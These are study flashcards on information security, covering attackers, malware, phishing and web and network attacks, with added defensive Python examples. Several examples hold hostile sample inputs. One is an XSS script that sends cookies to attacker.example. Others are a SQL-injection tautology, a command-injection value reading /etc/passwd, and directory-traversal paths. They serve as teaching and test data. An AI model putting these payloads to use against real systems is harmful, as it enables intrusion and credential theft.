The flashcards below were created by user
on FreezingBlue Flashcards.
Name the number one type of internet fraud.
Nigerian 419 (advance-fee) fraud
Name the difficulties in Defending Against Attacks.
- Universally connected devices
- Increased speed of attacks
- Greater sophistication of attacks
- Availability and simplicity of attack tools
- Faster detection of vulnerabilities (attackers find and weaponize flaws faster than defenders can patch them)
What is Information Security?
Guarding digitally formatted information that provides value to people and organizations.
Name the 3 Types of information protection and describe them.
1. Confidentiality- only approved individuals may access information
2. Integrity- information is correct and unaltered
3. Availability- information is accessible to authorized users
What are the protections implemented to secure information?
Authentication - confirms an individual is who they claim to be
Authorization - grants the ability to access information
Accounting - provides tracking of events (who did what, and when)
Terminology- What is an ASSET?
Item of value
Terminology- What is a THREAT?
Actions or events that have potential to cause harm
Terminology- What is a THREAT AGENT?
Person or element with power to carry out a threat
Terminology- What is a VULNERABILITY?
Flaw or weakness that allows a threat agent to bypass security.
Terminology- What is a RISK?
- Likelihood that threat agent will exploit vulnerability.
- Cannot be eliminated entirely and some degree of risk must be assumed.
What are the options to deal with risk?
Accept - acknowledge that there is a chance of loss and live with it.
Diminish (mitigate) - take precautions that reduce the likelihood or impact; most information security risks should be handled this way.
Transfer - shift the risk to a third party, for example by purchasing insurance.
What are some potential cyberterrorism targets?
Banking, Military, Energy (power plants), Water Systems
Suppose the author of an online banking software system has programmed in a secret feature so that program emails him the account information for any account whose balance has just gone over $10,000. What kind of attack is this and what are some of its risks?
Trojan horse, since it has a hidden malicious action bundled with a useful service (it also behaves like a logic bomb, firing only when a balance crosses $10,000). Risks: the author receives confidential account data for every high-value customer, and the bank leaks that data with no external attacker involved and no sign of trouble, because the software otherwise works as advertised.
What is a Hacker?
Person who uses computer skills to attack computers. The term is not commonly used in the security community.
What is the difference between White Hat Hackers and Black Hat Hackers?
A white hat hacker's goal is to expose security flaws, not to steal or corrupt data. A black hat hacker's goal is malicious and destructive.
What is a Script Kiddie and their skill level?
An unskilled user whose goal is to break into computers to cause damage. Script kiddies download automated attack tools (scripts) rather than writing their own. About 40% of attacks are attributed to script kiddies.
What is a Computer Spy?
Person hired to break into a computer to steal information. Hired to attack a specific computer or system containing sensitive information. Possess excellent computer skills to attack and cover their tracks.
What are Insiders and give examples?
- Employees, contractors, and business partners. 48% of breaches are attributed to insiders.
- Examples: a government employee planted a malicious script; a stock trader concealed losses through fake transactions.
What are Cybercriminals?
- Network of attackers, identity thieves, spammers, financial fraudsters.
- They are more motivated, better funded, take more risk.
What are Cyberterrorists?
- Criminals with Ideological Motivation; attacking because of their principles and beliefs.
- Goals: Deface electronic information and spread misinformation and propaganda. Deny Service to legitimate users. Commit unauthorized intrusions.
Name the 5 Steps of an Attack and describe them.
- 1. Probe for Information - such as the type of hardware or software used.
- 2. Penetrate Any Defenses - launch the attack.
- 3. Modify Security Settings - allows the attacker to reenter the compromised system easily.
- 4. Circulate to Other Systems - the same tools are directed toward other systems.
- 5. Paralyze Networks and Devices.
What are the Fundamental Security Principles for defenses?
- Layering: information security must be created in layers. A single defense mechanism may be easy to break, but it is unlikely an attacker can break through all the layers; this provides the most comprehensive protection.
- Limiting: limiting access to information reduces the threat against it. Only those who must use the data are granted access.
- Methods of limiting access: Technology - file permissions; Procedural - prohibiting document removal from the premises.
- Diversity: closely related to layering, the layers must be diverse. If attackers penetrate one layer, the same techniques are unsuccessful in breaking through the other layers.
- Obscurity: obscuring inside details from outsiders. Example: not revealing details such as the type of computer, OS version, or brand of software used.
- Simplicity: a secure system should be simple for insiders to understand and use. Simple from the inside and complex from the outside.
Name the goals of IS.
- Prevent data theft
- Thwart identity theft
- Avoid legal consequences of not securing info
- Maintain productivity
- Foil cyberterrorism
What does Malicious Software do?
Software that enters a computer system without the owner's knowledge or consent. Its objectives are infecting systems, concealing its purpose, and making a profit.
What is a Virus?
Malicious computer code that reproduces itself on the same computer.
What are some examples of virus actions?
- cause a computer to repeatedly crash
- erase files from or reformat the hard drive
- turn off the computer's security settings
Name the 3 virus infection methods and describe them.
Appender Infection - the virus appends itself to the end of a file, moves the first three bytes of the original file into the virus code, and replaces them with a jump instruction pointing to the virus code.
Swiss Cheese Infection - the virus injects itself into the executable code; the original code is transferred and stored inside the virus code, and the host code executes properly after the infection.
Split Infection - the virus splits into several parts placed at random positions in the host program; the head of the virus code starts at the beginning of the file and gives control to the next piece of virus code.
Describe virus' characteristics.
- cannot automatically spread to another computer; relies on user action to spread
- attached to files
- spread by transferring infected files
Name and describe the 5 types of computer viruses.
- Program - infects executable files
- Macro - a script written in a macro language and embedded in a document; executes when the document is opened
- Resident - loads into memory and infects files opened by the user or the OS
- Boot virus - infects the Master Boot Record
- Companion virus - adds a malicious copycat program that the OS runs instead of the intended one
What is a Worm?
- Malicious program, exploits application or OS vulnerability. Sends copies of itself to other network devices.
- Worms may consume resources or leave behind a payload to harm infected systems.
Describe Worm Development.
- 1. Identify a vulnerability that is still unpatched.
- 2. Write code to exploit the vulnerability, generate a target list, install and execute the payload, and query/report whether a host is already infected.
- 3. Initial deployment on a botnet.
How does a Worm spread?
Worms use a network to travel from one computer to another.
What is a Trojan?
Program that does something other than advertised. Typically executable programs that contain hidden code that launches an attack.
What are Rootkits?
- Software tools used by an attacker to hide actions or presence of other types of malicious software.
- Hide or remove traces of log-in records, log entries.
- May alter or replace OS files with modified versions, specifically designed to ignore malicious activity.
How do you detect a Rootkit?
- Can be detected using programs that compare file contents (or their hashes) with known-good original files.
- Rootkits that operate at the OS's lower levels (kernel mode) may be difficult to detect from within the compromised system.
- Removal of a rootkit can be difficult: it must be erased and the original OS files restored; often the only reliable fix is to reformat the hard drive and reinstall the OS.
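As an added example (not part of the original flashcards), the "compare file contents with the originals" check in Python: hash every file under a directory into a baseline, then diff the tree against it later. The fake /bin tree, its contents and the rootkit's changes are constructed in a temporary directory; in real use the baseline would be signed and stored off the host, since a rootkit that can rewrite the baseline defeats the check.

```python
# Added example (not from the flashcards): a minimal file-integrity baseline,
# the "compare file contents with the originals" technique the rootkit card describes.
# The "system" tree, its files and the rootkit's changes are constructed in a temp dir.
import hashlib
import json
import os
import tempfile


def hash_file(path, chunk_size=65536):
    """SHA-256 of a file, read in chunks so large binaries do not load into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Map every regular file under root (relative POSIX path) to its digest."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = hash_file(full)
    return baseline


def verify_baseline(root, baseline):
    """Compare the tree with a stored baseline.

    Returns (modified, missing, added): files whose digest changed, files that
    disappeared, and files not in the baseline (a dropped kernel module, say).
    """
    current = build_baseline(root)
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    missing = sorted(p for p in baseline if p not in current)
    added = sorted(p for p in current if p not in baseline)
    return modified, missing, added


def demo():
    """Baseline a fake /bin, then a 'rootkit' trojans ps and drops a hidden module."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        for name, content in (("ls", b"original ls binary"), ("ps", b"original ps binary")):
            with open(os.path.join(root, "bin", name), "wb") as f:
                f.write(content)
        # In practice the baseline is signed and kept off the host; a rootkit that can
        # rewrite the baseline too defeats the check. Here it is simply serialised.
        stored = json.dumps(build_baseline(root))

        with open(os.path.join(root, "bin", "ps"), "wb") as f:
            f.write(b"trojaned ps that hides the attacker's processes")
        with open(os.path.join(root, "bin", "hidden.ko"), "wb") as f:
            f.write(b"kernel module")

        return verify_baseline(root, json.loads(stored))


if __name__ == "__main__":
    modified, missing, added = demo()
    print("modified:", modified, "missing:", missing, "added:", added)
```

Running demo() reports bin/ps as modified and bin/hidden.ko as added. The caveat on the card still applies: a kernel-mode rootkit can lie to the scanner about what the file contains, which is why serious integrity checks boot from trusted media or compare against hashes kept elsewhere.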
What is a Logic Bomb?
Computer code that lies dormant until triggered by a specific logical event (such as a date or a particular transaction), then performs malicious activities. It is difficult to detect before it is triggered.
What is a Backdoor?
Software code that circumvents normal security to give access to a program. Leaving one in during development is a common practice; the intent is to remove backdoors from the final application, and a backdoor that survives into production is a serious vulnerability.
Name malware designed to profit attackers.
Botnets, spyware, adware, and keyloggers (described in the following cards).
What is a Botnet?
- Computer is infected with program that allows it to be remotely controlled by attacker. Often payload of Trojans, worms, and viruses.
- Infected computer called a zombie.
- Groups of zombie computers together called botnet.
What are the Botnets' advantages for attackers?
- Operate in the background with no visible evidence of their existence.
- It provides means for concealing actions of attacker.
- It can remain active for years.
What is Spyware?
Software that gathers information without user consent, usually for advertising, collecting personal information, or changing computer configurations.
What are Spyware's negative effects?
- Slows computer performance
- Causes system instability
- May install new browser menus or toolbars
- May place new shortcuts
- May hijack homepage
- Causes increased pop-ups
What is Adware?
Program that delivers advertising content in a manner unexpected and unwanted by the user. May open new browser windows at random and also track online activities.
What are Keyloggers?
Program that captures user's keystrokes. Information later retrieved by attacker. Attacker searches for useful information: passwords, credit card numbers, personal information.
What are Social Engineering Attacks? What are some types?
- Directly gathering information from individuals, relies on trusting nature of individuals. Persuade the victim to provide information or take action.
- Types: phishing, impersonation, dumpster diving, tailgating.
What is Phishing?
- Type of Social Engineering Attack.
- Sending an email that claims to be from a legitimate source and tries to trick the user into giving up private information.
What are variations of Phishing and describe them?
- Pharming - automatically redirects the user to a fraudulent website, typically by corrupting DNS or the local hosts file, so even a correctly typed address goes to the attacker.
- Spear phishing - email messages target specific users.
- Whaling - going after the "big fish", targeting wealthy individuals or senior executives.
- Vishing - voice phishing; the attacker calls the victim with a recorded "bank" message, the victim calls back the number given and enters private information.
What are ways to recognize phishing messages?
- Deceptive web links, e.g. an @ sign in the middle of the address (the browser treats everything before the @ as a username and connects to the host after it)
- Variations of legitimate addresses
- Presence of vendor logos that look legitimate
- Fake sender's address
- Urgent request
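As an added example (not from the flashcards), Python heuristics for the link-based tells above: the @ trick, look-alike and brand-in-subdomain variations, bare IP hosts and plain http. TRUSTED_DOMAINS and the sample links are constructed for the demo, and the registrable-domain helper is a deliberate simplification (a real checker would consult the public suffix list).

```python
# Added example (not from the flashcards): checks for the phishing-link tells the card lists.
# TRUSTED_DOMAINS and the sample links are constructed for the demo.
from urllib.parse import urlsplit

# Hypothetical: the domains this recipient legitimately deals with.
TRUSTED_DOMAINS = ("examplebank.com", "paypal.com")


def edit_distance(a, b):
    """Levenshtein distance; 'paypa1.com' is one edit from 'paypal.com'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(host):
    """Last two labels of the host (a crude stand-in for a public-suffix lookup)."""
    labels = host.rstrip(".").split(".")
    return ".".join(labels[-2:])


def phishing_indicators(url):
    """Return the deceptive features found in a link; an empty list means no tell fired."""
    reasons = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()

    # The '@' trick: "https://www.examplebank.com@203.0.113.5/" really goes to 203.0.113.5;
    # everything before the '@' is userinfo and plays no part in routing.
    if parts.username is not None:
        reasons.append(f"userinfo '{parts.username}' hides real host {host}")

    domain = registrable_domain(host)
    if domain not in TRUSTED_DOMAINS:
        for trusted in TRUSTED_DOMAINS:
            # Variation of a legitimate address: brand used as a subdomain of another site
            if trusted in host:
                reasons.append(f"trusted name '{trusted}' appears inside untrusted host {host}")
            # Variation of a legitimate address: typo-squat / look-alike domain
            distance = edit_distance(domain, trusted)
            if 0 < distance <= 2:
                reasons.append(f"'{domain}' is {distance} edit(s) from '{trusted}'")

    if host.replace(".", "").isdigit():
        reasons.append("host is a bare IP address")
    if parts.scheme == "http":
        reasons.append("plain http, not https")
    return reasons


if __name__ == "__main__":
    for link in ("https://www.paypal.com/",
                 "https://www.examplebank.com@203.0.113.5/login",
                 "http://paypa1.com/verify",
                 "https://paypal.com.evil.example/"):
        print(link, "->", phishing_indicators(link) or "no indicators")
```

The legitimate link produces no indicators; the @ link is flagged for both the hidden host and the bare IP; the typo-squat is flagged for being one edit from the brand and for plain http. Heuristics like these belong in a mail gateway or a browser-side warning, not as the only defense: a fake sender address and urgent wording (the other tells on the card) need the human reader.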
What is Spam?
Unsolicited email, a primary vehicle for the distribution of malware. Sending spam is a lucrative business.
What is Spim?
Spam that targets IM users.
What are some Spammer Techniques and describe them?
- GIF Layering- image spam divided into multiple images, layers make up one complete legible message
- Word Splitting- horizontally separating words, can still be read by human eye
- Geometric Variance- uses speckling and different colors so no two emails appear to be the same
What are Hoaxes?
False warning or claim, may be first step in an attack.
What is Dumpster Diving?
Digging through trash to find useful info.
What is Tailgating?
Following behind an authorized individual through an access door.
What are some methods of Tailgating?
- Tailgater calls "please hold the door."
- Waits outside door and enters when authorized employee leaves.
- Employee conspires with unauthorized person to walk together through open door.
What is Shoulder Surfing?
Casually observing user entering keypad code.
What are Zero Day attacks?
- Attacks that target applications
- Exploit previously unknown vulnerabilities
- Victims have no time to prepare or defend
What are the two approaches to securing Web applications?
- Hardening the web server
- Protecting the network
What are common web app attacks?
- Cross-site scripting
- SQL injection
- XML injection
- Command injection/ directory traversal
What is Cross Site Scripting (XSS)?
- Injecting scripts into a web application server in order to direct attacks at its clients.
- When a victim visits the injected web site, the malicious instructions are sent to the victim's browser, which cannot distinguish between the site's valid code and the attacker's code.
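As an added example (not from the flashcards), the same comment page rendered in Python two ways, to show why the browser cannot tell the attacker's script from the site's own and what output encoding does about it. PAGE, the comment PAYLOAD and the script-tag counter are all constructed for the demo.

```python
# Added example (not from the flashcards): the same comment page rendered unsafely and safely.
# PAGE, PAYLOAD and the counter are constructed for the demo.
import html
import re

PAGE = "<html><body><h1>Comments</h1><div class=\"comment\">{comment}</div></body></html>"

# What a stored-XSS attacker posts as a "comment": the script ships the viewer's cookie offsite.
PAYLOAD = ("Nice post!<script>new Image().src="
           "'https://attacker.example/steal?c='+document.cookie</script>")

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def render_vulnerable(comment):
    """Reflects the stored comment straight into the markup. The victim's browser
    sees one HTML document and runs the attacker's script as if it were the site's own."""
    return PAGE.format(comment=comment)


def render_safe(comment):
    """Entity-encodes the untrusted text, so '<', '>', '&' and quotes become data,
    not markup. Output encoding is the distinction the browser itself cannot make."""
    return PAGE.format(comment=html.escape(comment, quote=True))


def count_script_tags(page):
    """Crude audit over rendered output: how many script tags would execute?"""
    return len(SCRIPT_TAG.findall(page))


if __name__ == "__main__":
    print("vulnerable:", count_script_tags(render_vulnerable(PAYLOAD)), "script tag(s)")
    print("safe:", count_script_tags(render_safe(PAYLOAD)), "script tag(s)")
    print(render_safe(PAYLOAD))
```

Escaping is context-specific: html.escape is right for text between tags, but a value placed inside a JavaScript block, a URL or a style attribute needs the encoding for that context, and a template engine that auto-escapes by default is the practical way to get this right everywhere.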
What is SQL Injection?
Targets SQL servers by injecting SQL commands through input the application does not filter. SQL is used to manipulate data stored in relational databases.
What is XML Injection?
- A markup language is a method for adding annotations to text.
- HTML uses tags surrounded by angle brackets to instruct the browser to display text in a specific format.
- XML carries data instead of indicating how to display it, and has no predefined set of tags.
Describe an XML attack and XPath injection.
An XML attack is similar to a SQL injection attack: the attacker discovers a web site that does not filter user data and injects XML tags and data into the database.
XPath injection is a specific type of XML injection attack that attempts to exploit XML Path Language (XPath) queries.
What is Command Injection/Directory Traversal attacks?
- Command Injection attack - the attacker enters an operating-system command in an input field so that it executes on the server.
- Directory Traversal attack - takes advantage of a software vulnerability (unvalidated path input) to move from the web root directory into restricted directories, typically with "../" sequences.
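As an added example (not from the flashcards), the two checks whose absence makes these attacks possible, in Python: containing a requested path inside a hypothetical WEB_ROOT, and building a ping command as an argv list with an allow-listed host instead of a shell string. Sample requests and host values are constructed; the command helpers only build commands and never execute them.

```python
# Added example (not from the flashcards): the checks that defeat directory traversal and
# command injection. WEB_ROOT and the sample inputs are constructed; nothing here runs a command.
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"   # hypothetical document root


def resolve_under_root(requested_path, web_root=WEB_ROOT):
    """Map a URL path onto the filesystem, or return None if it would escape web_root.

    Percent-encoding is decoded once (%2e%2e%2f is '../'), '..' segments are collapsed
    with normpath, and commonpath is the containment test. A plain startswith() check
    would wrongly accept '/var/www/html_evil/...' as being inside '/var/www/html'.
    """
    decoded = unquote(requested_path)
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


HOSTNAME = re.compile(r"^[A-Za-z0-9.-]{1,253}$")   # allow-list: letters, digits, dot, dash


def ping_command_vulnerable(host):
    """Shell string with the user's input spliced in: '8.8.8.8; cat /etc/passwd'
    becomes two commands once /bin/sh -c parses it."""
    return f"ping -c 1 {host}"


def ping_argv_safe(host):
    """Allow-list the input and pass it as a single argv element, so no shell ever
    parses it (subprocess.run(ping_argv_safe(h)) with no shell=True)."""
    if not HOSTNAME.match(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    for req in ("/images/logo.png", "/../../etc/passwd", "/%2e%2e/%2e%2e/etc/passwd"):
        print(req, "->", resolve_under_root(req))
    print(ping_command_vulnerable("8.8.8.8; cat /etc/passwd"))
    print(ping_argv_safe("example.com"))
```

The traversal check decodes exactly once on purpose: decoding in a loop until the string stops changing is a common mistake that lets double-encoded input (%252e) sneak past a check done at a different layer.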
Web application attacks are server side or client side attacks?
Server Side attacks
What is a Drive-by Download?
- A client computer is compromised simply by viewing a web page. Attackers inject content into a vulnerable web server after gaining access to the server's OS.
- Attackers craft a zero-pixel frame to avoid visual detection.
- An HTML document is embedded inside the main document.
- The client's browser downloads the malicious script.
- The script instructs the computer to download malware.
What is a Header Manipulation? Examples?
- HTTP headers contain fields that characterize the data being transmitted.
- Headers originate from the web browser; browsers do not normally let users edit them, but an attacker's short program (or an intercepting proxy) can set any header to any value.
- EX: Referer and Accept-Language
Describe Referer and Accept-Language.
- Referer field indicates the site that generated the request for the web page; an attacker can modify this field to hide the fact that the request came from another site, such as a modified web page hosted on the attacker's computer.
- Accept-Language: some web apps pass the contents of this field directly to a database query; an attacker could inject a SQL command by modifying this header.
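As an added example (not from the flashcards) serving both the SQL injection card and the Accept-Language card above: a login query built by string concatenation beside a parameterised one, run against an in-memory SQLite table constructed for the demo. The header case is the same defect with a different untrusted input.

```python
# Added example (not from the flashcards): a login query built by string concatenation
# versus a parameterised query, against an in-memory SQLite table constructed for the demo.
# The Accept-Language functions show the header card: same defect, different input source.
import sqlite3


def make_db():
    """Two constructed users; 'lang' stands for a value copied from Accept-Language."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, lang TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "en-US"), ("bob", "hunter2", "de-DE")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Untrusted strings are pasted into the SQL text, so a quote in them rewrites the query.
    password = "' OR '1'='1" turns the WHERE clause into
        username = 'alice' AND password = '' OR '1'='1'
    which is true for every row: the attacker is 'logged in' without a password."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Placeholders: the values travel separately and are never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def users_by_language_vulnerable(conn, accept_language):
    """The Accept-Language card: a header value dropped straight into a query."""
    sql = f"SELECT username FROM users WHERE lang = '{accept_language}'"
    return [row[0] for row in conn.execute(sql)]


def users_by_language_safe(conn, accept_language):
    return [row[0] for row in
            conn.execute("SELECT username FROM users WHERE lang = ?", (accept_language,))]


INJECTION = "' OR '1'='1"   # the classic tautology payload (constructed)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, "alice", INJECTION))
    print("safe login:", login_safe(db, "alice", INJECTION))
    print("vulnerable header:", users_by_language_vulnerable(db, "xx" + INJECTION))
    print("safe header:", users_by_language_safe(db, "xx" + INJECTION))
```

Parameterisation fixes the bug regardless of where the string came from (form field, cookie, Referer, Accept-Language). Input "filtering" of quotes is a weaker defense that breaks legitimate names like O'Brien and can be bypassed with encodings the database, not the filter, understands.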
Name and describe the types of Cookies.
- First-party cookie: created by the web site the user is currently visiting
- Third-party cookie: placed by a site's advertisers to record user preferences across sites
- Session cookie: stored in RAM and expires when the browser is closed
- Persistent cookie: recorded on the computer's hard drive; does not expire when the browser closes
- Secure cookie: sent only when the browser visits the server over an encrypted (HTTPS) connection, so it is protected in transit; the flag does not encrypt the cookie's contents themselves
- Flash cookie (Local Shared Object): stored by Adobe Flash Player rather than the browser, can hold much more data than a traditional cookie, and cannot be deleted through the browser's cookie settings
Who/What can read Cookies?
Only the web site (domain) that created it; the browser does not send it to other sites.
What security/privacy risks do cookies pose?
- may be stolen and used to impersonate user
- used to tailor advertising
- can be exploited by attackers
What is Session hijacking?
- Client side attack
- Attacker attempts to impersonate the user by stealing or guessing the session token (e.g., the session ID stored in a cookie)
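As an added example (not from the flashcards), Python that issues a session cookie the way the attack above assumes it often is not (unguessable token, Secure, HttpOnly, SameSite) and audits Set-Cookie headers for the attributes that limit theft. WEAK_HEADER is a constructed sample; the 22-character minimum corresponds to 16 random bytes in URL-safe base64.

```python
# Added example (not from the flashcards): issuing a session token the hijacking card assumes
# is often done badly, plus an audit of Set-Cookie values. WEAK_HEADER is constructed.
import secrets
from http.cookies import SimpleCookie

MIN_TOKEN_CHARS = 22   # 16 random bytes in URL-safe base64; guessing is hopeless at this size


def new_session_cookie(name="sid"):
    """Return (token, Set-Cookie value) for a fresh, unguessable session."""
    token = secrets.token_urlsafe(16)      # OS CSPRNG, never a counter or timestamp
    cookie = SimpleCookie()
    cookie[name] = token
    cookie[name]["secure"] = True          # the card's 'secure cookie': HTTPS only, no sniffing
    cookie[name]["httponly"] = True        # page scripts cannot read it, so XSS cannot steal it
    cookie[name]["samesite"] = "Lax"       # not attached to cross-site requests
    cookie[name]["path"] = "/"
    return token, cookie.output(header="").strip()


def audit_set_cookie(header_value):
    """List the weaknesses in one Set-Cookie value that make hijacking easier."""
    cookie = SimpleCookie()
    cookie.load(header_value)
    problems = []
    for name, morsel in cookie.items():
        if not morsel["secure"]:
            problems.append(f"{name}: missing Secure (sent in clear over http)")
        if not morsel["httponly"]:
            problems.append(f"{name}: missing HttpOnly (readable by injected script)")
        if not morsel["samesite"]:
            problems.append(f"{name}: missing SameSite")
        if len(morsel.value) < MIN_TOKEN_CHARS:
            problems.append(f"{name}: token {morsel.value!r} is short enough to guess")
    return problems


# Constructed: the kind of header a legacy app emits, with a small sequential token.
WEAK_HEADER = "sid=100045; Path=/"

if __name__ == "__main__":
    token, header = new_session_cookie()
    print("Set-Cookie:", header)
    print("audit of good header:", audit_set_cookie(header) or "no problems")
    print("audit of weak header:", audit_set_cookie(WEAK_HEADER))
```

The two halves of the defense match the two halves of the attack on the card: a random token defeats guessing, and the Secure/HttpOnly attributes close the two most common theft routes (sniffing on the wire, and exfiltration by injected script). Rotating the token after login and expiring it server-side limit the damage when one is stolen anyway.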
What are Malicious add-ons?
- Client Side attack
- Browser extensions (add-ons) provide multimedia or interactive web content
- ActiveX add-ons have several security concerns: once installed they run as native code with the user's full privileges
What is a Buffer Overflow attack?
- Client side attack
- A process attempts to store data in RAM beyond the boundaries of a fixed-length storage buffer
- The data overflows into adjacent memory locations
- May cause the computer to stop functioning (crash)
- An attacker can overwrite the saved "return address" so that execution is redirected to a memory address containing the attacker's code
What is a Denial of Service attack (DoS)? Name 3 types.
- Network Attack
- Attempts to prevent a system from performing its normal functions.
- Ping Flood attack, Smurf attack, SYN Flood attack
Describe a Ping Flood attack.
The ping utility is used to send a large number of ICMP echo request messages, overwhelming the target (e.g., a web server).
Describe a Smurf attack.
ICMP echo requests are sent to a network's broadcast address with the source address spoofed to the target's. Every host on the network replies to the target at once, so it appears as if the target computer asked all of them for a response.
Describe a SYN Flood attack.
Takes advantage of the TCP three-way handshake: the attacker sends many SYN packets (often from spoofed addresses) and never completes the handshake, so the server's table of half-open connections fills up and legitimate clients cannot connect.
What is a Distributed Denial of Service (DDoS)?
Attacker uses many zombie computers in a botnet to flood a device with requests. It is virtually impossible to identify and block the source of the attack.
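As an added example (not from the flashcards), detection logic for the SYN flood described above, run over a constructed connection log in a hypothetical '<time> <src> <dst_ip:port> <flags>' format: count SYNs whose sender never sent the final ACK, per target, and note how many distinct sources they came from.

```python
# Added example (not from the flashcards): finding a SYN flood in a connection log.
# The log format is hypothetical ('<time> <src> <dst_ip:port> <flags>', seen from the
# capture point) and every line below is constructed.
from collections import defaultdict

LOG_LINES = [
    "0.000 198.51.100.7 10.0.0.5:80 SYN",          # normal client: full handshake
    "0.001 10.0.0.5 198.51.100.7:51512 SYN-ACK",
    "0.002 198.51.100.7 10.0.0.5:80 ACK",
    "0.003 198.51.100.9 10.0.0.5:443 SYN",         # another normal client
    "0.004 10.0.0.5 198.51.100.9:40000 SYN-ACK",
    "0.005 198.51.100.9 10.0.0.5:443 ACK",
]
# Flood: 300 SYNs to :80 from 250 spoofed sources that never send the final ACK.
LOG_LINES += [f"{0.1 + i * 0.001:.3f} 203.0.113.{i % 250 + 1} 10.0.0.5:80 SYN"
              for i in range(300)]


def half_open_by_target(lines):
    """Per target ip:port -> (SYNs never completed, distinct sources sending them).

    SYN-ACKs are the server's own replies and are skipped. Each uncompleted SYN is a
    backlog slot the victim holds open waiting for an ACK that never comes."""
    syns = defaultdict(int)
    completed = set()
    for line in lines:
        _t, src, dst, flags = line.split()
        if flags == "SYN":
            syns[(src, dst)] += 1
        elif flags == "ACK":
            completed.add((src, dst))
    counts = defaultdict(int)
    sources = defaultdict(set)
    for (src, dst), n in syns.items():
        if (src, dst) not in completed:
            counts[dst] += n
            sources[dst].add(src)
    return {dst: (counts[dst], len(sources[dst])) for dst in counts}


def syn_flood_targets(lines, threshold=100):
    """Targets whose half-open count crosses the threshold."""
    return sorted(dst for dst, (half_open, _srcs) in half_open_by_target(lines).items()
                  if half_open >= threshold)


if __name__ == "__main__":
    print(half_open_by_target(LOG_LINES))
    print("flooded:", syn_flood_targets(LOG_LINES))
```

The report shows 300 half-open connections to 10.0.0.5:80 spread over 250 sources. That second number is the useful one for response: when the sources are spoofed, blocking by address achieves nothing, and the mitigation has to be at the victim (SYN cookies, which avoid allocating backlog state until the ACK arrives) or upstream rate limiting.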
What is Man-in-the-Middle?
- Interception of legitimate communication.
- Forging a fictitious response to the sender.
- Passive attack records transmitted data.
- Active attack alters contents of transmission before sending to recipient.
What are Replay Attacks?
- Similar to a passive man-in-the-middle attack.
- Attacker makes a copy of a transmission and uses the copy at a later time. EX: capturing logon credentials and resubmitting them.
- More sophisticated replay attacks: the attacker captures a network device's message to a server; later sends the original, valid message to the server; this establishes a trust relationship between the attacker and the server.
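As an added example (not from the flashcards), the replay in Python: a captured, correctly authenticated login is resubmitted to a server that checks only the MAC, and to one that also requires a fresh timestamp and an unseen nonce. The shared key, clock and messages are constructed for the demo.

```python
# Added example (not from the flashcards): a captured, correctly authenticated message
# replayed against a server that checks only the MAC, beside one that also checks
# freshness and nonce uniqueness. Key, clock and messages are constructed.
import hashlib
import hmac
import json

KEY = b"shared-secret-constructed-for-this-demo"


def sign(payload, nonce, ts):
    """Client side: canonical JSON body plus HMAC-SHA256 over it."""
    body = json.dumps({"payload": payload, "nonce": nonce, "ts": ts}, sort_keys=True).encode()
    return {"body": body, "mac": hmac.new(KEY, body, hashlib.sha256).hexdigest()}


def mac_ok(msg):
    expected = hmac.new(KEY, msg["body"], hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, msg["mac"])   # constant-time compare


class NaiveServer:
    """Verifies integrity only. A genuine message stays valid forever, so whoever
    sniffed it (the card's passive MITM) can resend it whenever they like."""
    def accept(self, msg):
        return mac_ok(msg)


class ReplaySafeServer:
    """Integrity plus freshness: timestamp inside a window, nonce never seen before.
    The window bounds the seen-set, since anything older is rejected without a lookup."""
    def __init__(self, now, window=30):
        self.now, self.window, self.seen = now, window, set()

    def accept(self, msg):
        if not mac_ok(msg):
            return False               # forged or tampered
        fields = json.loads(msg["body"])
        if abs(self.now() - fields["ts"]) > self.window:
            return False               # stale capture (or bad clock): replayed too late
        if fields["nonce"] in self.seen:
            return False               # exact replay inside the window
        self.seen.add(fields["nonce"])
        return True


def demo():
    """Fixed clock so the run is deterministic. Returns each server's decisions."""
    clock = {"t": 1_700_000_000}

    def now():
        return clock["t"]

    login = sign({"action": "login", "user": "alice"}, nonce="7f3a", ts=now())
    naive, safe = NaiveServer(), ReplaySafeServer(now)
    results = {
        "naive_first": naive.accept(login),
        "naive_replay": naive.accept(login),    # still accepted: the attack works
        "safe_first": safe.accept(login),
        "safe_replay": safe.accept(login),      # same nonce: rejected
    }
    clock["t"] += 3600                           # the attacker waits an hour
    stale = sign({"action": "login"}, nonce="9c1d", ts=now() - 3600)
    results["safe_late_replay"] = safe.accept(stale)
    tampered = {"body": login["body"].replace(b"alice", b"mallory"), "mac": login["mac"]}
    results["safe_tampered"] = safe.accept(tampered)
    return results


if __name__ == "__main__":
    for name, decision in demo().items():
        print(f"{name:17} {decision}")
```

The MAC proves who wrote the message, not when; only the nonce and timestamp bind it to a single use. The same idea is why a protocol challenge (server-chosen nonce the client must echo) defeats the "captured device message" variant on the card: the captured reply answers yesterday's challenge, not today's.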
